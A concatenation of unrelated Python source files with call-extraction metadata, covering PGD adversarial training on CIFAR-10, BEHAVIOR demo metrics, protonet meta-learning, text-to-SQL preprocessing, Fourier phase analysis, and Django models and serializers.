args.adv_train = True
# Training options
args.dataset = 'cifar10'
args.batch_size = 128
args.max_epoch = 200
args.lr = 0.1
args.lr_step = 0.1
args.lr_milestones = [100, 150]
args.log_gap = 5
# Attack options
args.random_start = True
args.step_size = 2.0 / 255
args.epsilon = 8.0 / 255
args.num_steps = 7
args.targeted = False
# Miscellaneous
args.data_path = '~/datasets/CIFAR10'
args.result_path = './results/classifier'
args.tensorboard_path = './results/classifier/tensorboard/train'
args.model_save_path = osp.join(args.result_path, 'model.latest')
args.model_best_path = osp.join(args.result_path, 'model.best')
if not osp.exists(args.result_path):
os.makedirs(args.result_path)
pprint(vars(args))
transform_train = transforms.Compose([
transforms.RandomCrop(32, 4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
])
train_set = datasets.CIFAR10(root=args.data_path, train=True, download=True, transform=transform_train)
val_set = datasets.CIFAR10(root=args.data_path, train=False, download=True, transform=transform_test)
train_loader = DataLoader(train_set, batch_size=args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(val_set, batch_size=args.batch_size, shuffle=False, num_workers=2)
classifier = WideResNet(depth=28, num_classes=10, widen_factor=2)
model = AttackerModel(classifier, vars(args))
model = torch.nn.DataParallel(model)
model = model.cuda()
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=0.9, weight_decay=2e-4)
schedule = optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.lr_milestones, gamma=args.lr_step)
writer = SummaryWriter(args.tensorboard_path)
# writer = None
train_model(args, train_loader, val_loader, model, optimizer, schedule, writer)
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"os.makedirs",
"torchvision.transforms.RandomHorizontalFlip",
"os.path.exists",
"model.WideResNet",
"train.train_model",
"torchvision.transforms.ToTensor",
"torchvision.datasets.CIFAR10",
"torch.utils.tensorboard.SummaryWriter",
"torch.nn.DataParallel",
"os.path.join",
"torchvision.transforms.RandomCrop",
"torch.optim.lr_scheduler.MultiStepLR"
] |
[((373, 442), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""PGD based adversarial training"""'}), "(description='PGD based adversarial training')\n", (396, 442), False, 'import argparse\n'), ((1088, 1130), 'os.path.join', 'osp.join', (['args.result_path', '"""model.latest"""'], {}), "(args.result_path, 'model.latest')\n", (1096, 1130), True, 'import os.path as osp\n'), ((1158, 1198), 'os.path.join', 'osp.join', (['args.result_path', '"""model.best"""'], {}), "(args.result_path, 'model.best')\n", (1166, 1198), True, 'import os.path as osp\n'), ((1567, 1663), 'torchvision.datasets.CIFAR10', 'datasets.CIFAR10', ([], {'root': 'args.data_path', 'train': '(True)', 'download': '(True)', 'transform': 'transform_train'}), '(root=args.data_path, train=True, download=True, transform=\n transform_train)\n', (1583, 1663), False, 'from torchvision import datasets, transforms\n'), ((1673, 1769), 'torchvision.datasets.CIFAR10', 'datasets.CIFAR10', ([], {'root': 'args.data_path', 'train': '(False)', 'download': '(True)', 'transform': 'transform_test'}), '(root=args.data_path, train=False, download=True, transform\n =transform_test)\n', (1689, 1769), False, 'from torchvision import datasets, transforms\n'), ((1785, 1863), 'torch.utils.data.DataLoader', 'DataLoader', (['train_set'], {'batch_size': 'args.batch_size', 'shuffle': '(True)', 'num_workers': '(2)'}), '(train_set, batch_size=args.batch_size, shuffle=True, num_workers=2)\n', (1795, 1863), False, 'from torch.utils.data import DataLoader\n'), ((1881, 1958), 'torch.utils.data.DataLoader', 'DataLoader', (['val_set'], {'batch_size': 'args.batch_size', 'shuffle': '(False)', 'num_workers': '(2)'}), '(val_set, batch_size=args.batch_size, shuffle=False, num_workers=2)\n', (1891, 1958), False, 'from torch.utils.data import DataLoader\n'), ((1977, 2029), 'model.WideResNet', 'WideResNet', ([], {'depth': '(28)', 'num_classes': '(10)', 'widen_factor': '(2)'}), '(depth=28, num_classes=10, widen_factor=2)\n', (1987, 2029), False, 'from model import WideResNet\n'), ((2092, 2120), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (2113, 2120), False, 'import torch\n'), ((2253, 2349), 'torch.optim.lr_scheduler.MultiStepLR', 'optim.lr_scheduler.MultiStepLR', (['optimizer'], {'milestones': 'args.lr_milestones', 'gamma': 'args.lr_step'}), '(optimizer, milestones=args.lr_milestones,\n gamma=args.lr_step)\n', (2283, 2349), True, 'import torch.optim as optim\n'), ((2360, 2396), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (['args.tensorboard_path'], {}), '(args.tensorboard_path)\n', (2373, 2396), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((2422, 2501), 'train.train_model', 'train_model', (['args', 'train_loader', 'val_loader', 'model', 'optimizer', 'schedule', 'writer'], {}), '(args, train_loader, val_loader, model, optimizer, schedule, writer)\n', (2433, 2501), False, 'from train import train_model\n'), ((1211, 1239), 'os.path.exists', 'osp.exists', (['args.result_path'], {}), '(args.result_path)\n', (1221, 1239), True, 'import os.path as osp\n'), ((1249, 1278), 'os.makedirs', 'os.makedirs', (['args.result_path'], {}), '(args.result_path)\n', (1260, 1278), False, 'import os\n'), ((1359, 1387), 'torchvision.transforms.RandomCrop', 'transforms.RandomCrop', (['(32)', '(4)'], {}), '(32, 4)\n', (1380, 1387), False, 'from torchvision import datasets, transforms\n'), ((1397, 1430), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', 
(1428, 1430), False, 'from torchvision import datasets, transforms\n'), ((1440, 1461), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1459, 1461), False, 'from torchvision import datasets, transforms\n'), ((1520, 1541), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (1539, 1541), False, 'from torchvision import datasets, transforms\n')]
|
import argparse
from igibson.examples.behavior.behavior_demo_batch import behavior_demo_batch
from igibson.metrics.agent import BehaviorRobotMetric
from igibson.metrics.disarrangement import KinematicDisarrangement, LogicalDisarrangement
from igibson.metrics.gaze import GazeMetric
from igibson.metrics.task import TaskMetric
def parse_args():
parser = argparse.ArgumentParser(description="Collect metrics from BEHAVIOR demos in manifest.")
parser.add_argument("demo_root", type=str, help="Directory containing demos listed in the manifest.")
parser.add_argument("log_manifest", type=str, help="Plain text file consisting of list of demos to replay.")
parser.add_argument("out_dir", type=str, help="Directory to store results in.")
return parser.parse_args()
def main():
args = parse_args()
def get_metrics_callbacks(**kwargs):
metrics = [
KinematicDisarrangement(),
LogicalDisarrangement(),
BehaviorRobotMetric(),
GazeMetric(),
TaskMetric(),
]
return (
[metric.start_callback for metric in metrics],
[metric.step_callback for metric in metrics],
[metric.end_callback for metric in metrics],
[metric.gather_results for metric in metrics],
)
behavior_demo_batch(args.demo_root, args.log_manifest, args.out_dir, get_metrics_callbacks)
if __name__ == "__main__":
main()
|
[
"igibson.metrics.disarrangement.LogicalDisarrangement",
"argparse.ArgumentParser",
"igibson.metrics.gaze.GazeMetric",
"igibson.metrics.disarrangement.KinematicDisarrangement",
"igibson.metrics.agent.BehaviorRobotMetric",
"igibson.examples.behavior.behavior_demo_batch.behavior_demo_batch",
"igibson.metrics.task.TaskMetric"
] |
[((360, 452), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Collect metrics from BEHAVIOR demos in manifest."""'}), "(description=\n 'Collect metrics from BEHAVIOR demos in manifest.')\n", (383, 452), False, 'import argparse\n'), ((1321, 1416), 'igibson.examples.behavior.behavior_demo_batch.behavior_demo_batch', 'behavior_demo_batch', (['args.demo_root', 'args.log_manifest', 'args.out_dir', 'get_metrics_callbacks'], {}), '(args.demo_root, args.log_manifest, args.out_dir,\n get_metrics_callbacks)\n', (1340, 1416), False, 'from igibson.examples.behavior.behavior_demo_batch import behavior_demo_batch\n'), ((894, 919), 'igibson.metrics.disarrangement.KinematicDisarrangement', 'KinematicDisarrangement', ([], {}), '()\n', (917, 919), False, 'from igibson.metrics.disarrangement import KinematicDisarrangement, LogicalDisarrangement\n'), ((933, 956), 'igibson.metrics.disarrangement.LogicalDisarrangement', 'LogicalDisarrangement', ([], {}), '()\n', (954, 956), False, 'from igibson.metrics.disarrangement import KinematicDisarrangement, LogicalDisarrangement\n'), ((970, 991), 'igibson.metrics.agent.BehaviorRobotMetric', 'BehaviorRobotMetric', ([], {}), '()\n', (989, 991), False, 'from igibson.metrics.agent import BehaviorRobotMetric\n'), ((1005, 1017), 'igibson.metrics.gaze.GazeMetric', 'GazeMetric', ([], {}), '()\n', (1015, 1017), False, 'from igibson.metrics.gaze import GazeMetric\n'), ((1031, 1043), 'igibson.metrics.task.TaskMetric', 'TaskMetric', ([], {}), '()\n', (1041, 1043), False, 'from igibson.metrics.task import TaskMetric\n')]
|
__all__ = ['cactus']
import os
import warnings
from pathlib import Path
import pytorch_lightning as pl
import wandb
from pytorch_lightning.loggers import WandbLogger
from unsupervised_meta_learning.cactus import *
from unsupervised_meta_learning.protonets import (CactusPrototypicalModel,
ProtoModule)
def cactus(
emb_data_dir: Path = None,
n_ways=20,
n_shots=1,
query=15,
batch_size=1,
epochs=300,
use_precomputed_partitions=False,
final_chkpt_name="final.chkpt",
final_chkpt_loc=os.getcwd(),
):
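    # Assemble the CACTUs data module (Omniglot, per the logger config below):
    # ways/shots/query control the episodic sampling, and precomputed partitions /
    # cached embeddings can be reused via the flags above instead of recomputed.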
dm = CactusDataModule(
ways=n_ways,
shots=n_shots,
query=query,
use_precomputed_partitions=use_precomputed_partitions,
emb_data_dir=emb_data_dir,
)
model = ProtoModule(
encoder=CactusPrototypicalModel(in_channels=1, hidden_size=64),
num_classes=20,
lr=1e-3,
cactus_flag=True,
)
logger = WandbLogger(
project="protonet",
config={
"batch_size": batch_size,
"steps": 30000,
"dataset": "omniglot",
"cactus": True,
"pre-loaded-partitions": use_precomputed_partitions,
"partitions": 1,
"n_ways": n_ways,
"n_shots": n_shots,
"query_shots": query,
},
log_model=True,
)
trainer = pl.Trainer(
profiler="simple",
# max_steps=30_000,
max_epochs=epochs,
fast_dev_run=False,
gpus=1,
log_every_n_steps=25,
check_val_every_n_epoch=1,
flush_logs_every_n_steps=1,
num_sanity_val_steps=2,
logger=logger,
default_root_dir="/home/nfs/oshirekar/unsupervised_ml/cactus_chkpnts/",
checkpoint_callback=True,
)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
trainer.fit(model, datamodule=dm)
trainer.save_checkpoint(os.path.join(final_chkpt_loc, final_chkpt_name))
wandb.finish()
return 0
|
[
"pytorch_lightning.Trainer",
"warnings.simplefilter",
"wandb.finish",
"os.getcwd",
"pytorch_lightning.loggers.WandbLogger",
"unsupervised_meta_learning.protonets.CactusPrototypicalModel",
"warnings.catch_warnings",
"os.path.join"
] |
[((571, 582), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (580, 582), False, 'import os\n'), ((968, 1248), 'pytorch_lightning.loggers.WandbLogger', 'WandbLogger', ([], {'project': '"""protonet"""', 'config': "{'batch_size': batch_size, 'steps': 30000, 'dataset': 'omniglot', 'cactus':\n True, 'pre-loaded-partitions': use_precomputed_partitions, 'partitions':\n 1, 'n_ways': n_ways, 'n_shots': n_shots, 'query_shots': query}", 'log_model': '(True)'}), "(project='protonet', config={'batch_size': batch_size, 'steps': \n 30000, 'dataset': 'omniglot', 'cactus': True, 'pre-loaded-partitions':\n use_precomputed_partitions, 'partitions': 1, 'n_ways': n_ways,\n 'n_shots': n_shots, 'query_shots': query}, log_model=True)\n", (979, 1248), False, 'from pytorch_lightning.loggers import WandbLogger\n'), ((1401, 1707), 'pytorch_lightning.Trainer', 'pl.Trainer', ([], {'profiler': '"""simple"""', 'max_epochs': 'epochs', 'fast_dev_run': '(False)', 'gpus': '(1)', 'log_every_n_steps': '(25)', 'check_val_every_n_epoch': '(1)', 'flush_logs_every_n_steps': '(1)', 'num_sanity_val_steps': '(2)', 'logger': 'logger', 'default_root_dir': '"""/home/nfs/oshirekar/unsupervised_ml/cactus_chkpnts/"""', 'checkpoint_callback': '(True)'}), "(profiler='simple', max_epochs=epochs, fast_dev_run=False, gpus=1,\n log_every_n_steps=25, check_val_every_n_epoch=1,\n flush_logs_every_n_steps=1, num_sanity_val_steps=2, logger=logger,\n default_root_dir='/home/nfs/oshirekar/unsupervised_ml/cactus_chkpnts/',\n checkpoint_callback=True)\n", (1411, 1707), True, 'import pytorch_lightning as pl\n'), ((2025, 2039), 'wandb.finish', 'wandb.finish', ([], {}), '()\n', (2037, 2039), False, 'import wandb\n'), ((1833, 1858), 'warnings.catch_warnings', 'warnings.catch_warnings', ([], {}), '()\n', (1856, 1858), False, 'import warnings\n'), ((1868, 1899), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""'], {}), "('ignore')\n", (1889, 1899), False, 'import warnings\n'), ((1971, 2018), 'os.path.join', 'os.path.join', (['final_chkpt_loc', 'final_chkpt_name'], {}), '(final_chkpt_loc, final_chkpt_name)\n', (1983, 2018), False, 'import os\n'), ((825, 879), 'unsupervised_meta_learning.protonets.CactusPrototypicalModel', 'CactusPrototypicalModel', ([], {'in_channels': '(1)', 'hidden_size': '(64)'}), '(in_channels=1, hidden_size=64)\n', (848, 879), False, 'from unsupervised_meta_learning.protonets import CactusPrototypicalModel, ProtoModule\n')]
|
#coding=utf8
import os, json, pickle, argparse, sys, time
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from asdl.asdl import ASDLGrammar
from asdl.transition_system import TransitionSystem
from asdl.action_info import get_action_infos
from preprocess.common_utils import Preprocessor
def process_example(processor, entry, db, trans, verbose=False):
# preprocess raw tokens, schema linking and subgraph extraction
entry = processor.pipeline(entry, db, verbose=verbose)
# generate target output actions
ast = trans.surface_code_to_ast(entry['sql'])
actions = trans.get_actions(ast)
entry['ast'] = ast
entry['actions'] = get_action_infos(tgt_actions=actions)
return entry
def process_tables(processor, tables_list, output_path=None, verbose=False):
tables = {}
for each in tables_list:
if verbose:
print('*************** Processing database %s **************' % (each['db_id']))
tables[each['db_id']] = processor.preprocess_database(each, verbose=verbose)
print('In total, process %d databases .' % (len(tables)))
if output_path is not None:
pickle.dump(tables, open(output_path, 'wb'))
return tables
def process_dataset(processor, dataset, tables, output_path=None, skip_large=False, verbose=False):
from utils.constants import GRAMMAR_FILEPATH
grammar = ASDLGrammar.from_filepath(GRAMMAR_FILEPATH)
trans = TransitionSystem.get_class_by_lang('sql')(grammar)
processed_dataset = []
for idx, entry in enumerate(dataset):
if skip_large and len(tables[entry['db_id']]['column_names']) > 100: continue
if verbose:
print('*************** Processing %d-th sample **************' % (idx))
entry = process_example(processor, entry, tables[entry['db_id']], trans, verbose=verbose)
processed_dataset.append(entry)
print('In total, process %d samples , skip %d extremely large databases.' % (len(processed_dataset), len(dataset) - len(processed_dataset)))
if output_path is not None:
# serialize preprocessed dataset
pickle.dump(processed_dataset, open(output_path, 'wb'))
    # for checking the preprocessed output (colab or local)
    # with open(os.path.join('/content/drive/MyDrive/Datasets/ratsql/datasets/vitext2sql_syllable_level/linegraph_out/processed_dataset.txt'), 'w', encoding='utf-8') as f:
    #     for text in processed_dataset:
    #         f.write(str(text) + '\n')
return processed_dataset
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--db_dir', type=str, default='data/database')
arg_parser.add_argument('--dataset_path', type=str, required=True, help='dataset path')
arg_parser.add_argument('--raw_table_path', type=str, help='raw tables path')
arg_parser.add_argument('--table_path', type=str, required=True, help='processed table path')
arg_parser.add_argument('--output_path', type=str, required=True, help='output preprocessed dataset')
arg_parser.add_argument('--skip_large', action='store_true', help='whether skip large databases')
arg_parser.add_argument('--verbose', action='store_true', help='whether print processing information')
args = arg_parser.parse_args()
processor = Preprocessor(db_dir=args.db_dir, db_content=False)
# loading database and dataset
if args.raw_table_path:
# need to preprocess database items
tables_list = json.load(open(args.raw_table_path, 'r', encoding="utf8"))
print('Firstly, preprocess the original databases ...')
start_time = time.time()
tables = process_tables(processor, tables_list, args.table_path, args.verbose)
print('Databases preprocessing costs %.4fs .' % (time.time() - start_time))
else:
tables = pickle.load(open(args.table_path, 'rb'))
dataset = json.load(open(args.dataset_path, 'r', encoding="utf8"))
start_time = time.time()
dataset = process_dataset(processor, dataset, tables, args.output_path, args.skip_large, verbose=args.verbose)
print('Dataset preprocessing costs %.4fs .' % (time.time() - start_time))
|
[
"asdl.asdl.ASDLGrammar.from_filepath",
"preprocess.common_utils.Preprocessor",
"argparse.ArgumentParser",
"os.path.dirname",
"time.time",
"asdl.transition_system.TransitionSystem.get_class_by_lang",
"asdl.action_info.get_action_infos"
] |
[((662, 699), 'asdl.action_info.get_action_infos', 'get_action_infos', ([], {'tgt_actions': 'actions'}), '(tgt_actions=actions)\n', (678, 699), False, 'from asdl.action_info import get_action_infos\n'), ((1367, 1410), 'asdl.asdl.ASDLGrammar.from_filepath', 'ASDLGrammar.from_filepath', (['GRAMMAR_FILEPATH'], {}), '(GRAMMAR_FILEPATH)\n', (1392, 1410), False, 'from asdl.asdl import ASDLGrammar\n'), ((2838, 2863), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2861, 2863), False, 'import os, json, pickle, argparse, sys, time\n'), ((3578, 3628), 'preprocess.common_utils.Preprocessor', 'Preprocessor', ([], {'db_dir': 'args.db_dir', 'db_content': '(False)'}), '(db_dir=args.db_dir, db_content=False)\n', (3590, 3628), False, 'from preprocess.common_utils import Preprocessor\n'), ((4241, 4252), 'time.time', 'time.time', ([], {}), '()\n', (4250, 4252), False, 'import os, json, pickle, argparse, sys, time\n'), ((90, 115), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (105, 115), False, 'import os, json, pickle, argparse, sys, time\n'), ((1423, 1464), 'asdl.transition_system.TransitionSystem.get_class_by_lang', 'TransitionSystem.get_class_by_lang', (['"""sql"""'], {}), "('sql')\n", (1457, 1464), False, 'from asdl.transition_system import TransitionSystem\n'), ((3902, 3913), 'time.time', 'time.time', ([], {}), '()\n', (3911, 3913), False, 'import os, json, pickle, argparse, sys, time\n'), ((4419, 4430), 'time.time', 'time.time', ([], {}), '()\n', (4428, 4430), False, 'import os, json, pickle, argparse, sys, time\n'), ((4058, 4069), 'time.time', 'time.time', ([], {}), '()\n', (4067, 4069), False, 'import os, json, pickle, argparse, sys, time\n')]
|
import h5py
import numpy as np
import math
import matplotlib.pyplot as plt
# multiple h5 files?
f = h5py.File('shockwave.h5', 'r')
dset2 = f['2'] # fourier
k_density_re = dset2['k_density_re'][...]
k_density_im = dset2['k_density_im'][...]
kx = dset2['kx'][...]
tk = dset2['t'][...]
k_density = k_density_re + 1j * k_density_im
dset4 = f['4'] # constants
R = dset4['radius'][...]
Omega = dset4['omega'][...]
delta = dset4['d_omega'][...]
L = dset4['length'][...]
N = dset4['no_atoms'][...]
phi = dset4['phi'][...]
g = dset4['non_lin'][...]
A_psi = dset4['amplitude_psi'][...]
w_psi = dset4['width_psi'][...]
A = dset4['amplitude'][...]
w = dset4['width'][...]
T_imag = dset4['t_imag'][...]
T_evo = dset4['t_evo'][...]
def find_zero_gradient(f_mag, t, k_index):
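    # Find indices where |f_mag[..., k_index]| peaks: the gradient has a local
    # minimum in magnitude and flips sign from positive to negative.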
f_2k = np.abs(f_mag[..., k_index])
max_indices = []
f_grad = np.gradient(f_2k)
for i in range(1, f_grad.shape[0] - 1):
if (abs(f_grad[i - 1]) > abs(f_grad[i]) < abs(f_grad[i + 1])) and (f_grad[i - 1] > 0 > f_grad[i + 1]):
max_indices.append(i)
return max_indices
# samples
imag_samples = 0
evo_samples = 1000
t_imag_start = 0
t_imag_end = t_imag_start + imag_samples
t_evo_start = 0
t_evo_end = t_evo_start + evo_samples - 1
k_dom = 4
k_half = int(kx.shape[0]/2)
k_index = k_half + k_dom
max_indices = find_zero_gradient(k_density, tk, k_index)
t_max = []
f_max = []
f_plats = []
for index in max_indices:
t_max.append(tk[index])
f_max.append(np.abs(k_density[index, k_index]))
f_plats.append(np.angle(k_density[index, k_index]))
start_index = 0
t_plat = []
plat_vals = []
for i in range(start_index, len(t_max)):
t_plat.append(t_max[i])
if f_plats[i] < 0:
plat_vals.append(f_plats[i] + math.pi)
else:
plat_vals.append(f_plats[i])
# plot fourier mag peaks matching plateaus
fig, (ax1, ax2) = plt.subplots(2, sharex=True)
fig.suptitle('Fourier transform (2k={}, '.format(str(round(kx[k_index], 4))) + r'$\Omega$' + '={})'.format(Omega))
ax1.plot(tk - T_imag, np.abs(k_density[..., k_index]))
ax1.plot(t_max - T_imag, f_max, 'r.')
ax1.set_ylabel(r'$|F_{2k}|$')
ax2.plot(tk - T_imag, np.angle(k_density[..., k_index]), label='phase')
ax2.plot(tk - T_imag, np.angle(k_density[..., k_index]) + math.pi, label='phase + ' + r'$\pi$')
ax2.plot(t_plat - T_imag, plat_vals, 'r.')
ax2.set_ylabel(r'$arg(F_{2k})$')
ax2.set_ylim([-math.pi, math.pi])
ax2.legend(loc='lower right')
ax2.set_yticks([-math.pi, -math.pi/2, 0, math.pi/2, math.pi])
ax2.set_yticklabels([r'$-\pi$', r'$-\frac{\pi}{2}$', '0', r'$\frac{\pi}{2}$', r'$\pi$'])
plt.xlabel('t')
fig.savefig('fourier_combined.png')
def phase_adjust(k):
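    # Pull out the plateau values of arg(F_2k) for wavenumber offset k: odd k are
    # shifted down by pi/2, only points with a nearly flat phase gradient
    # (|grad| < 0.005) are kept, negative values are wrapped up by pi, and values
    # in (0.1, 2) are returned together with their times relative to T_imag.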
phase = np.angle(k_density[..., k_half + k])
grad = np.gradient(phase)
t_phase = []
if not k % 2 == 0: # shift odd wavenumbers
phase = phase - math.pi/2
adjusted = []
for i in range(len(phase)):
if abs(grad[i]) < 0.005: # gradient threshold
if phase[i] < 0:
phase[i] += math.pi
if 0.1 < phase[i] < 2:
adjusted.append(phase[i])
t_phase.append(tk[i] - T_imag)
return t_phase, adjusted
# plot plateaus for different k
fig, ax = plt.subplots()
ax.plot(phase_adjust(2)[0], phase_adjust(2)[1], label='2k=2')
ax.plot(phase_adjust(3)[0], phase_adjust(3)[1], label='2k=3')
ax.plot(phase_adjust(4)[0], phase_adjust(4)[1], label='2k=4')
ax.plot(phase_adjust(5)[0], phase_adjust(5)[1], label='2k=5')
ax.plot(phase_adjust(6)[0], phase_adjust(6)[1], label='2k=6')
ax.set_xlabel('t')
ax.set_ylabel(r'$arg(F_{2k})$')
ax.set_ylim([0, math.pi])
ax.set_title('Fourier density phase (' + r'$\Omega$' + '={})'.format(Omega))
ax.legend()
plt.yticks([0, math.pi/4, math.pi/2, 3*math.pi/4, math.pi], ['0', r'$\frac{\pi}{4}$', r'$\frac{\pi}{2}$', r'$\frac{3\pi}{4}$', r'$\pi$'])
fig.savefig('fourier_phase.png')
fig, ax = plt.subplots()
ax.plot(tk - T_imag, np.abs(k_density[..., k_index]))
ax.plot(t_max - T_imag, f_max, 'r.')
ax.set_ylim([0, 1])
fig.savefig('fourier_peaks.png')
|
[
"h5py.File",
"numpy.abs",
"numpy.angle",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.subplots",
"numpy.gradient"
] |
[((101, 131), 'h5py.File', 'h5py.File', (['"""shockwave.h5"""', '"""r"""'], {}), "('shockwave.h5', 'r')\n", (110, 131), False, 'import h5py\n'), ((1842, 1870), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)'], {'sharex': '(True)'}), '(2, sharex=True)\n', (1854, 1870), True, 'import matplotlib.pyplot as plt\n'), ((2568, 2583), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""t"""'], {}), "('t')\n", (2578, 2583), True, 'import matplotlib.pyplot as plt\n'), ((3184, 3198), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3196, 3198), True, 'import matplotlib.pyplot as plt\n'), ((3675, 3827), 'matplotlib.pyplot.yticks', 'plt.yticks', (['[0, math.pi / 4, math.pi / 2, 3 * math.pi / 4, math.pi]', "['0', '$\\\\frac{\\\\pi}{4}$', '$\\\\frac{\\\\pi}{2}$', '$\\\\frac{3\\\\pi}{4}$', '$\\\\pi$']"], {}), "([0, math.pi / 4, math.pi / 2, 3 * math.pi / 4, math.pi], ['0',\n '$\\\\frac{\\\\pi}{4}$', '$\\\\frac{\\\\pi}{2}$', '$\\\\frac{3\\\\pi}{4}$', '$\\\\pi$'])\n", (3685, 3827), True, 'import matplotlib.pyplot as plt\n'), ((3857, 3871), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3869, 3871), True, 'import matplotlib.pyplot as plt\n'), ((776, 803), 'numpy.abs', 'np.abs', (['f_mag[..., k_index]'], {}), '(f_mag[..., k_index])\n', (782, 803), True, 'import numpy as np\n'), ((838, 855), 'numpy.gradient', 'np.gradient', (['f_2k'], {}), '(f_2k)\n', (849, 855), True, 'import numpy as np\n'), ((2008, 2039), 'numpy.abs', 'np.abs', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (2014, 2039), True, 'import numpy as np\n'), ((2131, 2164), 'numpy.angle', 'np.angle', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (2139, 2164), True, 'import numpy as np\n'), ((2654, 2690), 'numpy.angle', 'np.angle', (['k_density[..., k_half + k]'], {}), '(k_density[..., k_half + k])\n', (2662, 2690), True, 'import numpy as np\n'), ((2702, 2720), 'numpy.gradient', 'np.gradient', (['phase'], {}), '(phase)\n', (2713, 2720), True, 'import numpy as np\n'), ((3893, 3924), 'numpy.abs', 'np.abs', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (3899, 3924), True, 'import numpy as np\n'), ((1459, 1492), 'numpy.abs', 'np.abs', (['k_density[index, k_index]'], {}), '(k_density[index, k_index])\n', (1465, 1492), True, 'import numpy as np\n'), ((1513, 1548), 'numpy.angle', 'np.angle', (['k_density[index, k_index]'], {}), '(k_density[index, k_index])\n', (1521, 1548), True, 'import numpy as np\n'), ((2203, 2236), 'numpy.angle', 'np.angle', (['k_density[..., k_index]'], {}), '(k_density[..., k_index])\n', (2211, 2236), True, 'import numpy as np\n')]
|
# Generated by Django 2.2.5 on 2020-01-15 12:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0047_auto_20200109_2243'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='publish',
),
migrations.AddField(
model_name='post',
name='state',
field=models.CharField(choices=[(-1, 'Draft'), (0, 'Queued'), (1, 'Publish')], default=-1, max_length=30),
),
]
|
[
"django.db.migrations.RemoveField",
"django.db.models.CharField"
] |
[((232, 289), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""post"""', 'name': '"""publish"""'}), "(model_name='post', name='publish')\n", (254, 289), False, 'from django.db import migrations, models\n'), ((430, 533), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[(-1, 'Draft'), (0, 'Queued'), (1, 'Publish')]", 'default': '(-1)', 'max_length': '(30)'}), "(choices=[(-1, 'Draft'), (0, 'Queued'), (1, 'Publish')],\n default=-1, max_length=30)\n", (446, 533), False, 'from django.db import migrations, models\n')]
|
import logging
from django.apps import apps
from django.conf import settings
from rest_framework import serializers
from zconnect.serializers import CreateDeviceSerializer, DeviceSerializer
from zconnect.models import Product
from .models import DemoDevice
logger = logging.getLogger(__name__)
class DemoDeviceSerializer(DeviceSerializer):
class Meta:
model = apps.get_model(settings.ZCONNECT_DEVICE_MODEL)
fields = ("id", "product", "name", "online", "last_seen", "fw_version",
"sensors_current", "orgs", "online", "sim_number", "created_at", "updated_at",
'online', 'sim_number',)
read_only_fields = ("id", "product", "orgs", "created_at", "updated_at",
'online', 'sim_number')
class CreateDemoDeviceSerializer(CreateDeviceSerializer):
class Meta:
model = DemoDevice
fields = ("id", "product", "name", "online", "last_seen", "fw_version",
"orgs", "online", "sim_number", "created_at", "updated_at",
'online', 'sim_number',)
read_only_fields = ("id", "created_at", "updated_at")
class DemoProductSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ("id", "version", "name", "iot_name", "sku", "manufacturer",
"url", "support_url", "previous_version", "periodic_data",
"periodic_data_interval_short", "periodic_data_num_intervals_short",
"periodic_data_interval_long", "periodic_data_num_intervals_long",
"periodic_data_retention_short", "server_side_events",
"battery_voltage_full", "battery_voltage_critical",
"battery_voltage_low", "created_at", "updated_at",)
read_only_fields = ("id", "created_at", "updated_at",)
|
[
"django.apps.apps.get_model",
"logging.getLogger"
] |
[((270, 297), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (287, 297), False, 'import logging\n'), ((378, 424), 'django.apps.apps.get_model', 'apps.get_model', (['settings.ZCONNECT_DEVICE_MODEL'], {}), '(settings.ZCONNECT_DEVICE_MODEL)\n', (392, 424), False, 'from django.apps import apps\n')]
|
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import operator
import logging
import sys
import time
from collections import defaultdict
from enum import Enum
from .. import promise
from ..config import options
from ..errors import DependencyMissing, ExecutionInterrupted, WorkerDead
from ..serialize import dataserializer
from ..scheduler.chunkmeta import WorkerMeta
from ..utils import log_unhandled, build_exc_info
from .events import EventContext, EventCategory, EventLevel, ProcedureEventType
from .storage import DataStorageDevice
from .utils import WorkerActor
logger = logging.getLogger(__name__)
